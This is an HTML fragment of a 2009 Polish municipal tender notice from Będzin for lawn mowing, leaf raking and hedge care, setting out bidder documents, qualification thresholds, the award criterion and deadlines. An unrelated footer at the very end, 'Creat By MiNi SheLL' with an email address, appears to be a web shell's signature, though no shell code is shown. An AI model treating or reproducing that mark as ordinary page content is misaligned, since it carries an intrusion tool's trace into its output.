<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 ustawy Pzp  na druku lub według druku  załącznik nr 2  do SIWZ.
W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności oraz  że nie podlega wykluczeniu  na podstawie art. 24 ust.1 ustawy Pzp Zamawiający żąda następujących dokumentów:
2.Aktualnego odpisu właściwego rejestru albo aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne  przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  .
 W celu  potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także że dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
3.Wykazu wykonanych usług (na lub wg druku stanowiącego załącznik nr 4 do SIWZ) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich  wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów  odbiorców potwierdzających, że usługi  te zostały wykonane należycie.
Wymaga się wykazania  1 usługi w zakresie koszenia trawników wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia na powierzchni minimum 40 ha o wartości minimum 180 000,00 zł i w zakresie grabienia liści wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia o wartości minimum 15 000,00 zł i w zakresie pielęgnacji żywopłotów wraz z zebraniem odpadów, utylizacją i wywozem w miejsce unieszkodliwienia o wartości minimum 30 000,00 zł,
4. Aktualnych zezwoleń wynikających z przepisów:
- ustawy o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2005r. nr 236 poz. 2008 ze zm.) tj. zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Będzin, 
- ustawy o odpadach (Dz. U. z 2001r. nr 62 poz. 628 ze zm.) tj. zezwolenie na prowadzenie działalności w zakresie transportu odpadów.
5.Wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, na lub wg wzoru stanowiącego załącznik nr 5 a do SIWZ - dla osób, którymi Wykonawca dysponuje i załącznik nr 5 b do SIWZ - dla osób, którymi Wykonawca będzie dysponował.
Wykaz winien zawierać: 
a)min.1 osobę  na stanowisko kierownika  prac posiadającego minimum średnie wykształcenie  ogrodnicze i minimum 5 letni staż pracy w ogrodnictwie lub przy zakładaniu i pielęgnacji terenów zielonych   oraz minimum 3 letnim stażem jako kierownik prac
 Do wykazu należy dołączyć kopie  dokumentu potwierdzające wykształcenie.
5.W przypadku udostępnienia Wykonawcy przez inne podmioty osób zdolnych do wykonania zamówienia Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.
6. W przypadku udostępnienia Wykonawcy przez inne podmioty niezbędnych do wykonania zamówienia  narzędzi i urządzeń  Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bedzin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych pok.117
Urząd Miejski w Będzinie
ul. 11 Listopada 20
42-500 Będzin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 09:00, miejsce: Biuro Zamówień Publicznych pok.117
Urząd Miejski w Będzinie
ul. 11 Listopada 20
42-500 Będzin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com